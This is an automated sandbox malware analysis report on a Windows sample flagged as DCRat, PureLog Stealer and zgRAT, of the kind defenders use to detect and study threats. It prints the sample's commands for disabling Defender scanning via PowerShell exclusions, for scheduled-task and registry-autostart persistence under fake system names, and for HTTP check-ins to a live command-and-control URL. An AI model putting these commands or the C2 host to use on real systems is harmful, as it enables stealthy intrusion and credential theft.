Windows Analysis Report
JNKHlxGvw4.exe

Overview

General Information

Sample name: JNKHlxGvw4.exe (renamed because the original name is a hash value)
Original sample name: 6689bd9a5c795eedc631e5fbb850b7ff.exe
Analysis ID: 1572666
MD5: 6689bd9a5c795eedc631e5fbb850b7ff
SHA1: b63d8e25d4eb9abea3ed0f7867f70db2ab18cba2
SHA256: cb4626ad921c63113e18c3aefb109f70c8e334089871133ea675d62d836d810b
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • JNKHlxGvw4.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\JNKHlxGvw4.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
    • csc.exe (PID: 908 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6352 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 908 cmdline: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 1892 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7860 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7200 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7216 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7244 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7252 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7668 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7804 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7892 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • USZqVcJFLA.exe (PID: 1432 cmdline: "C:\Recovery\USZqVcJFLA.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • lsass.exe (PID: 7096 cmdline: C:\Users\user\Favorites\lsass.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • lsass.exe (PID: 1364 cmdline: C:\Users\user\Favorites\lsass.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • RuntimeBroker.exe (PID: 6412 cmdline: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • RuntimeBroker.exe (PID: 2312 cmdline: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • USZqVcJFLA.exe (PID: 5344 cmdline: C:\Recovery\USZqVcJFLA.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • USZqVcJFLA.exe (PID: 5756 cmdline: C:\Recovery\USZqVcJFLA.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • JNKHlxGvw4.exe (PID: 7980 cmdline: C:\Users\user\Desktop\JNKHlxGvw4.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • JNKHlxGvw4.exe (PID: 7996 cmdline: C:\Users\user\Desktop\JNKHlxGvw4.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • SystemSettings.exe (PID: 8016 cmdline: "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • SystemSettings.exe (PID: 8032 cmdline: "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • RuntimeBroker.exe (PID: 7808 cmdline: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • USZqVcJFLA.exe (PID: 6596 cmdline: "C:\Recovery\USZqVcJFLA.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • cleanup
Malware configuration (DCRat): {"C2 url": "http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp", "MUTEX": "DCR_MUTEX-uarUuV05qHqkni1Ppe0P", "Params": {"0": "", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara matches in process memory dumps

Source | Rule | Description | Author | Strings
00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1861105197.0000000012615000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: JNKHlxGvw4.exe PID: 6588 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
0.2.JNKHlxGvw4.exe.1ad80000.6.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.2.JNKHlxGvw4.exe.1ad80000.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                    System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\JNKHlxGvw4.exe, ProcessId: 6588, TargetFilename: C:\Users\user\Favorites\lsass.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', ProcessId: 1892, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Users\user\Favorites\lsass.exe, CommandLine: C:\Users\user\Favorites\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Favorites\lsass.exe, NewProcessName: C:\Users\user\Favorites\lsass.exe, OriginalFileName: C:\Users\user\Favorites\lsass.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\Favorites\lsass.exe, ProcessId: 7096, ProcessName: lsass.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\JNKHlxGvw4.exe, ProcessId: 6588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\JNKHlxGvw4.exe, ProcessId: 6588, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", ProcessId: 908, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', ProcessId: 1892, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\JNKHlxGvw4.exe, ProcessId: 6588, TargetFilename: C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', ProcessId: 1892, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Users\user\Favorites\lsass.exe, CommandLine: C:\Users\user\Favorites\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Favorites\lsass.exe, NewProcessName: C:\Users\user\Favorites\lsass.exe, OriginalFileName: C:\Users\user\Favorites\lsass.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\Favorites\lsass.exe, ProcessId: 7096, ProcessName: lsass.exe

                    Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", ProcessId: 908, ProcessName: csc.exe

                    Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f, ProcessId: 908, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T18:55:24.716612+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 104.21.16.1 | 80 | TCP
2024-12-10T18:56:30.482340+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 104.21.16.1 | 80 | TCP
2024-12-10T18:56:38.609309+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 104.21.16.1 | 80 | TCP
2024-12-10T18:56:46.794894+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 104.21.16.1 | 80 | TCP
2024-12-10T18:56:55.060545+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 104.21.16.1 | 80 | TCP
2024-12-10T18:57:10.451235+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 104.21.16.1 | 80 | TCP
2024-12-10T18:57:18.873049+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 104.21.16.1 | 80 | TCP
2024-12-10T18:57:34.810568+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49770 | 104.21.16.1 | 80 | TCP


                    AV Detection

Source: JNKHlxGvw4.exe | Avira: detected
Source: http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php | Avira URL Cloud: Label: malware
Source: http://188387cm.n9shteam.in | Avira URL Cloud: Label: malware
Source: http://188387cm.n9shteam.in/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Recovery\USZqVcJFLA.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\EDQjSEMY.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\RzSYqgUu.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\OljzCgRG.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: 00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp", "MUTEX": "DCR_MUTEX-uarUuV05qHqkni1Ppe0P", "Params": {"0": "", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | ReversingLabs: Detection: 78%
Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe | ReversingLabs: Detection: 78%
Source: C:\Recovery\USZqVcJFLA.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\EDQjSEMY.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\OljzCgRG.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\RzSYqgUu.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\bSdYXpxm.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\uhdUZoxx.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\vnccfbfp.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Favorites\lsass.exe | ReversingLabs: Detection: 78%
Source: JNKHlxGvw4.exe | ReversingLabs: Detection: 78%
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Recovery\USZqVcJFLA.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\oBKeyAWK.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\OljzCgRG.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AsBtWtog.log | Joe Sandbox ML: detected
Source: JNKHlxGvw4.exe | Joe Sandbox ML: detected
Source: JNKHlxGvw4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Directory created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Directory created: C:\Program Files\Windows Multimedia Platform\9e60a5f7a3bd80
Source: JNKHlxGvw4.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.pdb | source: JNKHlxGvw4.exe, 00000000.00000002.1832050899.0000000002A09000.00000004.00000800.00020000.00000000.sdmp

                    Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File opened: C:\Users\user\AppData\Local

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49768 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49764 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49765 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49770 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49766 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49762 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49763 -> 104.21.16.1:80
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 188387cm.n9shteam.inContent-Length: 332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
